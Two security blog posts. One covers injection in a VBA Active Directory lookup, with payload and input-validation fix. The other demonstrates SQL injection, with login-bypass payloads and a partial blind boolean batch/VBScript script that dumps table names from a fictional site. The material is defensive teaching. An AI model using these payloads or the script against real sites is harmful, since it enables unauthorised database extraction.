Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.
I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.
These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.
What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]
A quick search on the interwebs gave me this as a suggested VBA function to do just that:
1: Function GetEmail(email as String) as String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Find our default domain base to search from
5: Set objRootDSE = GetObject("LDAP://RootDSE")
6: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
8: ' Open a connection to AD
9: Set ADOConnection = CreateObject("ADODB.Connection")
10: ADOConnection.Provider = "ADsDSOObject"
11: ADOConnection.Open "Active Directory Provider"
13: ' Create a command
14: Set ADCommand = CreateObject("ADODB.Command")
15: ADCommand.ActiveConnection = ADOConnection
17: 'Find user based on their email address
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' and mail='" & email & "'"
22: ' Execute this command
23: Set ADRecordSet = ADCommand.Execute
25: ' Extract the canonical email address for this user.
26: GetEmail = ADRecordSet.Fields("Mail")
28: ' Return.
29: End Function
That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.
Yesterday the printout caught my eye. Here’s the particular line that made me stop:
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
That looks like a SQL query, doesn’t it?
Probably because it is.
It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.
Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.
I checked this out – when I called this function as follows, I got the first email address in the list as a response:
1: Debug.Print GetEmail("x' OR mail='*")
You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.
Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:
1: ADCommand.CommandText = _
2: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
3: strBase & "WHERE objectCategory='user' AND mail=?"
5: 'Create and bind parameter
6: Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
7: ADCommand.Parameters.Append ADParam
That way, the question mark “?” gets replaced with “’firstname.lastname@example.org’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).
That’s the rather meaningful message:
Run-time error ‘-2147467262 (80004002)’:
No such interface supported
It doesn’t actually tell me which interface is supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…
The interface that isn’t supported is the ability to set parameters.
The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.
Why on earth would you miss that out, Microsoft?
So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.
In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.
Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.
If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.
Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.
Sometimes the mere presence of an error is useful.
Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.
Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.
Seriously, Microsoft, this is an unforgiveable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]
Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.
Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.
And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.
Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.
1: Function GetEmail(email As String) As String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Pre-execution input validation - email must contain only recognised characters.
5: If email Like "*[!a-zA-Z0-9_@.]*" Then
6: GetEmail = "Illegal characters"
7: Exit Function
8: End If
11: ' Find our default domain base to search from
12: Set objRootDSE = GetObject("LDAP://RootDSE")
13: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
15: ' Open a connection to AD
16: Set ADOConnection = CreateObject("ADODB.Connection")
17: ADOConnection.Provider = "ADsDSOObject"
18: ADOConnection.Open "Active Directory Provider"
20: ' Create a command
21: Set ADCommand = CreateObject("ADODB.Command")
22: ADCommand.ActiveConnection = ADOConnection
24: 'Find user based on their email address
25: ADCommand.CommandText = _
26: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
27: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
29: ' Execute this command
30: Set ADrecordset = ADCommand.Execute
32: ' Post execution validation - we should have exactly one answer.
33: If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then
34: GetEmail = "Not found"
35: Exit Function
36: End If
37: If ADrecordset.RecordCount > 1 Then
38: GetEmail = "Many matches"
39: Exit Function
40: End If
42: ' Extract the canonical email address for this user.
43: GetEmail = ADrecordset.Fields("Mail")
45: ' Return.
46: End Function
As always, let me know if you find this at all useful.
But then, I’m hacking your website because of a 15-year-old flaw.
It’s been noted for some time that I love playing with XSS, simply because it’s so widespread, and because it’s an indication of the likely security stance of the rest of the website.
But if XSS is important because it’s widely spread, it’s got a relatively low impact.
Slightly less widely spread, but often the cause of far greater damage, is SQL injection.
I’ll talk some more later about how SQL injection happens, but for now a quick demonstration of the power of SQL injection.
Every demonstration of SQL injection I’ve ever seen includes this example:
sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"
And of course, the trick here is to supply the user ID “
admin” and the password “
' OR 1='1”.
Sure, IF you have that code in your app, that will let the user in as admin.
But then, IF you have that code in your app, you have many bigger problems than SQL injection – because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.
More likely, if you have SQL injection in the logon code at all, is that you will have code like this:
sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
… execute sqlCommandString …
… extract salt …
… hash incoming password …
… compare salted hash of incoming password against stored password …
Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID “
' OR userid LIKE '%” – but then the attacker would have to know the field was called userid, and they’re only going to get the first account in your database that has that password.
Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.
Where do you use a SQL-like database?
Anywhere there’s a table of data to be queried, whether it’s a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.
Imagine I’ve got a dictionary searching page, weblexicon.example (that doesn’t exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.
If I give it a real word, it tells me the definition(s).
If I give it a non-existent word, it apologises for being unable to help me.
Seems like a database search is used here. Let’s see if it’s exploitable, by asking for “example’” – that’s “example” with an extra single quote at the end.
That’s pretty cool – we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word ‘example’ are in fact two single-quotes. A bit confusing, but it helps to understand what’s going on here.
So, let’s feed the web lexicon a value that might exploit it. Sadly, it doesn’t accept multiple commands, and gives the “You have an error in your SQL syntax” message when I try it.
Worse still, for some reason I can’t use the “UNION” or “JOIN” operators to get more data than I’m allowed. This seems to be relatively common when there are extra parentheses, or other things we haven’t quite guessed about the command.
That means we’re stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesn’t? Let’s try that in a query to look up a true / false value:
So now, we can ask true / false questions against the database.
Seems rather limiting.
Let’s say we’re looking to see if the MySQL server is running a particular vulnerable version – we could ask for “example’ and @@version=’18.104.22.168” – a true response would give us the hint that we can exploit that vulnerability.
But the SQL language has so many other options. We can say “does your version number begin with a ‘4’”
A bit more exciting, but still pedestrian.
What if I want to find out what the currently executing statement looks like? I could ask “is it an ‘a’? a ‘b’? a ‘c’?” and so on, but that is too slow.
Instead, I could ask for each bit of the characters, and that’s certainly a good strategy – but the one I chose is to simply do a binary search, which is computationally equivalent.
A fifteen-year-old vulnerability (SQL injection is older than that, but I couldn’t do the maths) deserves the same age of language to write my attack in.
So I chose batch file and VBScript (OK, they’re both older than 15). Batch files can’t actually download a web page, so that’s the part I wrote in VBScript.
And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.
So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
if "!last!" lss "!last2!" (
set /a lasti=!lasti!+1
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
set /a mid=%lower%-1
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem echo . | set /p foo=%found: =+%
@set /a nchars=%nchars%+1
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@set /a lasti=!lasti!+1
And the output (demonstrating that there are still some concurrency issues to take care of):
Yes, that’s all it takes.
If you’re a developer of a web app which uses a relational database back-end, take note – it’s exactly this easy to dump your database contents. A few changes to the batch file, and I’m dumping column names and types, then individual items from tables.
And that’s all assuming I’m stuck with a blind SQL injection.
The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. It’s made easier by the fact that I can also access the command I’m injecting into, by virtue of MySQL including that in a process table.
Note that if I’m attacking a different site with a different injection point, I need to make two changes to my batch script, and I’m away. Granted, this isn’t exactly sqlmap.py, but then again, sqlmap.py doesn’t always find or exploit all the vulns that you have available.
The takeaways today:
The code in this article is for demonstration purposes – I’m not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your site’s data, but can be prevented by a small change.
Don’t use this code to do bad things. Don’t use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.